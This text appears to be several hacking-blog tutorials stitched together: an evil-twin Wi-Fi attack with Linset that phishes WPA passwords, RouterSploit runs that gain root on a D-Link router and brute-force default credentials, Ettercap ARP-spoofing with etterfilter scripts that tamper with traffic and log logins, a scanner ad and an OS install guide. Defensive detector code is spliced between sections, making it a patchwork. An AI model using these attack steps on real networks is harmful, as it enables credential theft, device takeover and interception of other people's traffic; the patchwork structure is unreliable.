custom linset

Today I'd like to share my own custom Linset. I've used it for a long time because it is more efficient and saves time. This custom Linset also has multilingual web interfaces; so far it supports several languages: English, Spanish, Italian, French, Portuguese, and Indonesian. I added English and Indonesian because my region uses both. You can customize it yourself to add more web interface languages or other features.

If you wonder what Linset is, I think you already know this powerful tool for setting up an evil-twin AP attack, written in bash. Linset supports DHCP, a FakeDNS server that redirects to the fake AP, etc. It has a bunch of dependencies, and the original is in Spanish. Other than that, it's pretty cool.

This custom Linset version, as mentioned above, is more efficient because it saves a lot of time: it detects the dependencies and installs missing ones automatically. If you're using Kali Linux or another pentest OS, this feature works flawlessly. If it produces an error instead, the cause is probably external, such as an incorrect repository.

How Linset Works

Linset sets up a fake AP by duplicating the ESSID, BSSID, and channel of the target network. You don't need an internet connection or wordlists, since the Evil-Twin AP doesn't perform any brute force at all. Instead, it acts like the original network, without the target noticing.
  • Scan the networks.
  • Select a network.
  • Capture the handshake (can be used without a handshake).
  • Choose one of several web interfaces.
  • Mount a FakeAP imitating the original.
  • A DHCP server is created on the FakeAP.
  • A DNS server is created to redirect all requests to the host.
  • The web server with the selected interface is launched.
  • A mechanism is launched to check the validity of the passwords that will be entered.
  • It deauthenticates all users of the network, hoping they connect to the FakeAP and enter the password.
  • The attack stops once a correct password has been checked.
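The fake AP flow above has a defensive mirror: a wireless IDS looks for exactly the duplicated ESSID and BSSID, the cloned BSSID showing up on a different channel, and the encryption downgrade from WPA2 to open that the captive-portal page depends on. The following is an added example, not part of Linset; the baseline inventory and the scan rows are constructed.

```python
"""Evil-twin indicators over constructed access-point scan records.

Added example (not part of Linset). Compares APs seen in a scan against
a baseline of the APs we own and flags the signs an evil twin produces:
an unknown BSSID advertising our ESSID, our BSSID on the wrong channel,
or our ESSID offered without the expected encryption.
"""
import csv
import io
from dataclasses import dataclass

# Authoritative inventory of our own access points (constructed values).
BASELINE = {
    "aa:bb:cc:dd:ee:01": {"essid": "CorpWiFi", "channel": 6, "privacy": "WPA2"},
    "aa:bb:cc:dd:ee:02": {"essid": "CorpWiFi", "channel": 11, "privacy": "WPA2"},
}

# Constructed scan rows (fields distilled from a scanner's per-AP output).
# The third row stands for a later sighting of the cloned BSSID: same MAC
# as our AP, but on channel 1 and open, which is how the fake AP presents.
SCAN_CSV = """\
bssid,channel,privacy,essid
aa:bb:cc:dd:ee:01,6,WPA2,CorpWiFi
aa:bb:cc:dd:ee:02,11,WPA2,CorpWiFi
aa:bb:cc:dd:ee:01,1,OPN,CorpWiFi
de:ad:be:ef:00:01,6,OPN,CorpWiFi
11:22:33:44:55:66,3,WPA2,Neighbour
"""


@dataclass(frozen=True)
class Alert:
    bssid: str
    essid: str
    reason: str


def parse_scan(text):
    """Parse the CSV text into a list of dicts with whitespace stripped."""
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    return [{k.strip(): v.strip() for k, v in row.items()} for row in reader]


def check_scan(rows, baseline=BASELINE):
    """Return one Alert per evil-twin indicator found in the scan rows."""
    our_essids = {ap["essid"] for ap in baseline.values()}
    alerts = []
    for row in rows:
        bssid, essid = row["bssid"].lower(), row["essid"]
        known = baseline.get(bssid)
        if known is None:
            # Somebody else's radio is using our network name.
            if essid in our_essids:
                alerts.append(Alert(bssid, essid, "unknown BSSID advertising our ESSID"))
            continue  # a neighbour's network: not ours to police
        if essid != known["essid"]:
            alerts.append(Alert(bssid, essid, f"our BSSID advertising ESSID {essid!r}"))
        if row["privacy"] != known["privacy"]:
            # WPA2 -> OPN is the downgrade a captive-portal clone needs.
            alerts.append(Alert(bssid, essid, f"privacy {known['privacy']} -> {row['privacy']}"))
        if int(row["channel"]) != known["channel"]:
            alerts.append(Alert(bssid, essid, f"channel {known['channel']} -> {row['channel']}"))
    return alerts


if __name__ == "__main__":
    for alert in check_scan(parse_scan(SCAN_CSV)):
        print(f"[!] {alert.bssid} ({alert.essid}): {alert.reason}")
```

A real deployment feeds this from a sensor that keeps every sighting rather than one merged row per BSSID, since a cloned MAC otherwise collapses into the legitimate entry.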

STEP 1 : Give Linset Executable Permission

After you download this custom Linset (the link is provided at the end of this article) and extract it, you need to give the custom linset and custom airmon-ng scripts executable permission.

STEP 2 : Run Custom Linset

When you run Linset for the first time, it checks the required dependencies and automatically installs any that are missing. Once all dependencies are present, you are taken to the setup session.

STEP 3 : Select The Interface

You don't need multiple interfaces, since this custom Linset also ships a custom airmon-ng, an older version from aircrack-ng that supports multi-interface mode on a single interface.

STEP 4 : Select Channel

If you're not sure which channel you should run on, choose all channels instead.

STEP 5 : Scan the Network

In this step, Linset dumps all the networks it captures around you. Press CTRL + C to interrupt the scan once your target network has been captured, and make sure the target network has at least one client connected. You may want to read more about airodump-ng in .....

STEP 6 : Select Target

Select your target. Notice that if a network has clients connected, Linset adds an asterisk next to its number.

STEP 7 : Select Mode of Fake AP

This configures which method Linset should use to set up the Evil Twin AP. I recommend using Hostapd.

STEP 8 : Capture or Select Handshake file

In this step, you are asked for a handshake file, usually a *.cap file. If you haven't captured a handshake yet, just press ENTER and capture a live handshake via Linset.

STEP 8 : Select the Type of Handshake Checking

I recommend the strict method, but that doesn't mean you're prohibited from using the other methods.

STEP 9 : Select The Deauth Clients Method

Since capturing the handshake requires deauthenticating a client first, choose option 3 if you want to be more efficient: it performs the deauth against the specified target AP.

STEP 10 : Verify Handshake !!!

Don't skip this step. You will notice two xterm windows: one is airodump-ng capturing the handshake, the other shows the deauth progress. You don't need to close either window. When you see "WPA handshake" followed by the BSSID MAC address at the top of the airodump-ng window, choose the verify-and-continue option in Linset's main terminal window. Once the handshake is verified, the airodump-ng window terminates automatically.

STEP 11 : Select Web Interface And Language

There is only one option, "Neutral web interface"; then select the interface language you want.

STEP 12 : Lean Back and Have a Coffee

Seriously, this is the final step. Here you need to be patient, waiting for clients of the target network to connect to our fake AP (the Evil Twin). I won't explain this step any further; just try it and have fun.

[Screenshots: the fake AP info, the DHCP server, the fake DNS server, and the deauth using mdk3; output as seen on the target devices, Windows 7 and Android ("Sign in required"), where the victim is brought to the fake authentication page.]

When the attack succeeds, see the output result file:

DOWNLOAD CUSTOM LINSET

Via Google Drive

RouterSploit - Router Exploitation Framework
 
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterSploit currently supports only a limited number of exploits out of the box, but they can be extended from popular exploit database sites online. Creating RouterSploit modules is easy, so everyone can contribute to this excellent project. The full process is described in the RouterSploit Wiki, where you can find a code skeleton and all the classes needed for module development. The process of creating RouterSploit modules is described there through a very helpful example. Hopefully, over time and through public contribution, this promising project will grow into one of the best tools for home router security auditing. RouterSploit consists of various modules that aid penetration testing operations:

  • Exploits - modules that take advantage of identified vulnerabilities.
  • Creds - modules designed to test credentials against network services.
  • Scanners - modules that check whether the target is vulnerable to any exploit.

RouterSploit Installation


$ apt-get install python-requests python-paramiko python-netsnmp
$ git clone https://github.com/reverse-shell/routersploit

Update


Update the RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.

$ cd routersploit
$ git pull


RouterSploit Usage

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >


You can use the Tab key for completion.

Options


Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. http://192.168.1.1
   port       80                   Target Port

Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module


Exploiting the target is done by issuing the 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root


It is also possible to check whether the target is vulnerable to a particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable


Info


Display information about the exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003


2. Creds


Modules located under the creds/ directory allow running dictionary attacks against various network services.

The following services are currently supported:

  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp

Every service has been divided into two modules:
  1. default (e.g. ssh_default) - these modules use one wordlist of default credential pairs in login:password form. The module runs quickly and verifies in a matter of seconds whether the device uses default credentials.
  2. bruteforce (e.g. ssh_bruteforce) - these modules perform dictionary attacks against a specified account or list of accounts. They take two parameters, login and password. Each value can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).

Console output:

rsf > use creds/ssh_default
rsf (SSH Default Creds) >

Options


rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings              Description                                              
   ----         ----------------              -----------                                              
   threads      8                             Numbers of threads                                       
   defaults     file:///path/defaults.txt     User:Pass or file

Set target:


rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}


Run module


rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 
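From the device's side, the run above leaves a distinctive trace in the SSH authentication log: many failed logins for different usernames from one source within a few seconds, followed by a success. As an added example (not part of RouterSploit), the script below parses constructed sshd-style log lines and flags that pattern; the host name, source addresses and timestamps are made up.

```python
"""Detecting a default-credential sweep in sshd authentication logs.

Added example (not part of RouterSploit). Groups failed logins per source
address in a sliding window, requires the failures to span several distinct
usernames (the signature of a default-credential list rather than one user
being brute-forced), and escalates when the same source then logs in.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed lines in the shape sshd writes through syslog (no year field).
SAMPLE_AUTH_LOG = """\
Mar  1 12:00:01 router sshd[1201]: Failed password for invalid user 3comcso from 192.168.1.10 port 51000 ssh2
Mar  1 12:00:01 router sshd[1202]: Failed password for invalid user 1234 from 192.168.1.10 port 51001 ssh2
Mar  1 12:00:02 router sshd[1203]: Failed password for invalid user 1111 from 192.168.1.10 port 51002 ssh2
Mar  1 12:00:02 router sshd[1204]: Failed password for invalid user ADVMAIL from 192.168.1.10 port 51003 ssh2
Mar  1 12:00:03 router sshd[1205]: Failed password for invalid user 266344 from 192.168.1.10 port 51004 ssh2
Mar  1 12:00:03 router sshd[1206]: Failed password for invalid user 1502 from 192.168.1.10 port 51005 ssh2
Mar  1 12:00:39 router sshd[1240]: Accepted password for admin from 192.168.1.10 port 51040 ssh2
Mar  1 12:05:00 router sshd[1300]: Failed password for admin from 192.168.1.20 port 40000 ssh2
Mar  1 12:05:30 router sshd[1301]: Accepted password for admin from 192.168.1.20 port 40001 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3})")


def parse(text, year=2016):
    """Return (timestamp, source, user, accepted) tuples for recognised lines."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog omits the year, so it is supplied by the caller.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["user"], m["result"] == "Accepted"))
    return events


def detect_sweeps(events, threshold=5, window=timedelta(seconds=60)):
    """Map source -> 'sweep' (burst of failures over distinct users) or
    'sweep+success' (the same source later authenticated successfully)."""
    recent = defaultdict(deque)  # src -> (timestamp, user) failures in window
    verdicts = {}
    for ts, src, user, accepted in sorted(events):
        if accepted:
            if verdicts.get(src) == "sweep":
                verdicts[src] = "sweep+success"
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct_users = {u for _, u in q}
        if len(q) >= threshold and len(distinct_users) >= threshold:
            verdicts.setdefault(src, "sweep")
    return verdicts


if __name__ == "__main__":
    for src, verdict in detect_sweeps(parse(SAMPLE_AUTH_LOG)).items():
        print(f"[!] {src}: {verdict}")
```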


3. Scanners


Scanners let you quickly verify whether the target is vulnerable to any exploit.

Pick the module


rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                


Set target:


rsf (D-Link Scanner) > set target 192.168.1.1

[+] {'target': '192.168.1.1'}


Run module


rsf (D-Link Scanner) > run

[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!

 - exploits/dlink/dwr_932_info_disclosure


It has been verified that the target is vulnerable to the dwr_932_info_disclosure exploit. Now use the proper module and exploit the target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
 
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Ettercap is a free and open source tool suite for man-in-the-middle attacks on a LAN. Ettercap works by putting the network interface into promiscuous mode and ARP poisoning the target machines. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even encrypted ones) and includes many features for network and host analysis. For downloads and more information. Today we're going to have fun with one of Ettercap's features, Etterfilter. Etterfilter lets us create a custom filter, which is what we'll do here.

ARP SPOOFING?

ARP (Address Resolution Protocol) spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol, and is limited to local network segments.

The basic principle behind ARP spoofing is to exploit the vulnerabilities in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN.

Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default gateway to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.
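The poisoned mapping described above is also what gives the attack away on the wire: the gateway's IP address suddenly answers from a different MAC, and one MAC starts claiming the addresses of several hosts. The following is an added example (not part of Ettercap) that parses constructed tcpdump-style ARP reply lines and flags those two changes; the addresses are made up.

```python
"""Passive ARP cache poisoning detection over tcpdump-style ARP lines.

Added example (not part of Ettercap). Tracks which MAC each IP claims in
ARP replies and alerts when a known IP (the gateway in particular) moves
to a new MAC, or when one MAC accumulates several IPs, which is what the
attacker's host does when it sits between victim and gateway.
"""
import re
from collections import defaultdict

# Reply lines as printed by `tcpdump -n arp`; the sample below is constructed.
ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)

SAMPLE_LOG = """\
12:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:02.000000 ARP, Reply 192.168.1.53 is-at 66:77:88:99:aa:bb, length 28
12:00:03.000000 ARP, Request who-has 192.168.1.53 tell 192.168.1.1, length 28
12:00:04.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
12:00:04.500000 ARP, Reply 192.168.1.53 is-at de:ad:be:ef:00:01, length 28
12:00:05.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
"""


def parse_replies(text):
    """Yield (ip, mac) for every ARP reply line; requests and noise are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY.search(line)
        if m:
            yield m.group("ip"), m.group("mac").lower()


def detect_poisoning(replies, gateway=None):
    """Return alert strings in the order the evidence appears."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            # A legitimate NIC swap or router failover looks the same, so an
            # operator still has to confirm; the gateway moving is the urgent case.
            tag = "GATEWAY " if ip == gateway else ""
            alerts.append(f"{tag}{ip} changed from {prev} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                claimed = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(f"{mac} now claims {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(parse_replies(SAMPLE_LOG), gateway="192.168.1.1"):
        print(f"[!] {alert}")
```

Repeated poison replies carrying the already-recorded MAC (the last line of the sample) do not re-alert, so the output stays readable while the attack is ongoing.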

ETTERFILTER?

Etterfilter utility is used to compile source filter files into binary filter files that can be interpreted by the JIT interpreter in the ettercap filter engine. You have to compile your filter scripts in order to use them in ettercap. All syntax/parse errors will be checked at compile time, so you will be sure to produce a correct binary filter for ettercap.

ARP SPOOFING Demos (Using EtterFilter)

In this demo, we will use ARP spoofing to replace some tags (images) in a victim's requests, just for fun or to prank your friends :)).

STEP 1 : Create a Custom Filter Script

First, create a new folder or directory to store our filter.

Open your favorite text editor and save the file with the ".filter" extension.

Here is a custom filter script to replace the img tag in HTML code:

# Requests towards port 80: mangle the Accept-Encoding header so the server
# answers uncompressed and the plain-text HTML can be matched below.
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("[*] Sucked Accept-Encoding!\n");
   }
}
# Responses from port 80: rewrite every img tag to point at the given URL.
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://3.bp.blogspot.com/-PfUQyJkxonE/VuHd2m2N-zI/AAAAAAAAAnc/clq0g6rIHQ0/s1600-r/ironbugs-kusayang.png\" ");
   msg("[+] Replace tag launched\n");
}

That script replaces the img tag in any HTML with the given destination URL. Save it, and make sure the script is in the folder we created earlier.

STEP 2 : Compile The Custom Script

To compile the custom filter script, use the following etterfilter command pattern:

etterfilter [filterscript.filter] -o [outputfilter.ef]

STEP 3 : Enable IP_Forward

Enable ip_forward with the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

By default the value of ip_forward is '0' (disabled); make sure to change it to '1' (enabled).

STEP 4 : Run Ettercap ARP Spoofing With Custom Etterfilter


ettercap -T -q -i [interface] -F [filter file] -M ARP /[Target IP]/ /[Gateway IP]/

If you want to ARP spoof all targets on the network, you do not need to add the "// //" target specification.

-T, to run in text-only mode (CLI)
-q, quiet mode, display less verbose output
-i, interface name
-F, specify the filter name
-M, mitm method to use

Output result, taken from the target machine:

[Screenshot: ARP spoofed target machine. Another output example is taken from irongeek.com (image source: irongeek.com).]

Other custom filters

Below are examples of other custom filters. You can modify or combine them to build a more complex filter.

# Display a message if the tcp port is 22

if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}

# Log all telnet traffic, also execute ./program on every packet

if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}

# Log all traffic except http

if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}

# Some operation on the payload of the packet

if ( DATA.data + 20 == 0x4142 ) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}

# Drop any packet containing "ettercap"

if (search(DECODED.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
   kill();
}

# Log ssh decrypted packets matching the regexp

if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}

# Dying packets

if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}

# The same for IPv6 but make sure we really see IPv6 packets doing such trivial tests

if (eth.proto == IP6 && ipv6.hl < 5) {
   msg("The IPv6 packet will die soon\n");
}

# String comparison at a given offset

if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}

# Inject a file after a specific packet

if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}

# Replace the entire packet with another

if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}

# Modifying binary data by using external commands

if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
   log(DATA.data, "/tmp/payload");
   drop();
   execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
   udp.len += 7;
   exec("/bin/rm /tmp/payload");
   msg("faked");
}

# Filter only a specific ip address

if (ip.src == '192.168.0.2') {
   drop();
}

# Do the same for IPv6

if (ipv6.src == '2001:db8::1') {
   drop();
}

# Combined both IPv4 and IPv6

if (eth.proto == IP && ip.dst == '192.168.0.2') {
   msg("drop IPv4");
   drop();
}
if (eth.proto == IP6 && ipv6.dst == '2001:db8::1') {
   msg("drop IPv6");
   drop();
}

# Translate the port of the tcp packet from 80 to 81

if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}

# Identify and mangle ESP packets

if (ip.proto == ESP) {
   DATA.data = "DEADDECAF";
}


ParanoicScan Vulnerability Scanner

ParanoicScan is a powerful, hacker-friendly vulnerability assessment tool.

ParanoicScan Feature List

  • XSS
  • SQL GET / POST
  • SQL GET
  • SQL GET + Admin
  • Directory listing
  • MSSQL
  • Jet Database
  • Oracle
  • LFI
  • RFI
  • Full Source Disclosure
  • HTTP Information
  • SQLi Scanner
  • Bypass Admin
  • Exploit FSD Manager
  • Paths Finder
  • IP Locate
  • Crack MD5
  • Panel Finder
  • Console
  • Generate all logs in a html file
  • Incorporates random and new user agent
  • Multi encoder / decoder :
    * Ascii
    * Hex
    * Url
    * Bin To Text & Text To Bin
  • PortScanner
  • HTTP FingerPrinting
  • CSRF Tool
  • Scan XSS
  • Generator for XSS Bypass
  • Tiny URL link generator
  • Exploit finder and downloader for Exploit-DB
  • MySQL Manager
  • LFI tools

ParanoicScan Video Tutorial


ParanoicScan Download


Installing DracOs on your HDD is actually neither very hard nor very easy. In the last article I posted a tutorial on how to install DracOs Linux using rsync. As I mentioned there, DracOs has no grub package, so it can't be installed directly to your hard disk as the primary OS. Instead, you need another primary Linux OS already installed on your hard disk.

Since DracOs Linux final was released a few days ago, some may have trouble installing DracOs on a machine. We have two options for installing DracOs: using rsync, or a regular installation via live CD. Neither option can be installed independently, for the reason I mentioned above. In this tutorial, I assume you have an empty partition of at least 15 GB on your HDD, formatted as EXT4. I assign that empty partition as /dev/sda7. After you've downloaded the .iso file and burned it to a CD in your preferred way, follow the steps below.

What You Need

OK, so now follow the steps carefully.

STEP 1 : Booting The DracOs Linux From Live CD

I'll skip the step of burning the .iso file to a CD, because I know you're advanced pentesters already :). At the first boot, select Run from live CD. Then you will be prompted with a username and password login form. If you're familiar with BackTrack you shouldn't worry about that; if not, enter the username and password as root : toor. Then type startx.

STEP 2 : Open The Terminal And Ready To Go

DracOs Linux uses the URxvt terminal; if you have any experience with Arch Linux, that's the one. To open the terminal press "Windows + Shift + Enter".

STEP 3 : Run Installation Setup

Now, type in the terminal:
$ install-dracos
You will see the DracOs installer, as shown in the image below. Then hit Enter on the <Install> menu.

dracos installer

STEP 4 : Setup Partition

We already have an empty partition at /dev/sda7, as I mentioned above. If you have any doubts, hit Enter on the <list> menu; it's a good way to recheck your partitions, just to make sure. Now, type the partition device manually in the form, then hit <OK>.


The installer will ask you to verify the destination partition. If you have any doubts, press <cancel> and redo step 4. If you are sure, hit <Yes>.


STEP 5 : Set The Hostname

By default, the hostname of DracOs Linux is 'dracOs'. You can change it as you wish. Then hit <OK> and the installer is ready to install DracOs Linux on your machine.


STEP 6 : Installing Process

The installation process takes a while, depending on your hardware specification. On a regular or standard computer it takes about 9 to 15 minutes; it can be less or more on some machines.

STEP 7 : No Grub !!!

Once the installation is done, it asks whether you want to install grub. Because DracOs Linux is still under development and has many bugs, the developers do not recommend installing grub. Just skip the grub option; we will do this from our primary Linux machine.


STEP 8 : Reboot and Update the Primary Linux Grub

Now boot into your primary Linux machine and update grub. That's it. Finished.
